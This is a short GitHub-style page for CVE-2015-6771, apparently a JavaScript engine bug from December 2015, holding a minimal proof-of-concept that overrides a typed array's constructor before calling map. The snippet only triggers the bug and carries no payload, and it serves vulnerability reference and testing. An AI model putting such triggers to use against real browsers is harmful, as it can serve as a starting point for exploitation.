Skip to content

CVE-2015-6771.md

Latest commit

 

History

History
19 lines (14 loc) · 403 Bytes

CVE-2015-6771.md

File metadata and controls

19 lines (14 loc) · 403 Bytes

CVE-2015-6771

  • Date: Dec 2015
  • Credit: ??

PoC

var typedArray = new Int8Array(1);
var saved;
var called;
typedArray.constructor = function(x) { called = true; saved = x };
typedArray.constructor.prototype = Int8Array.prototype;
typedArray.map(function(){});

Reference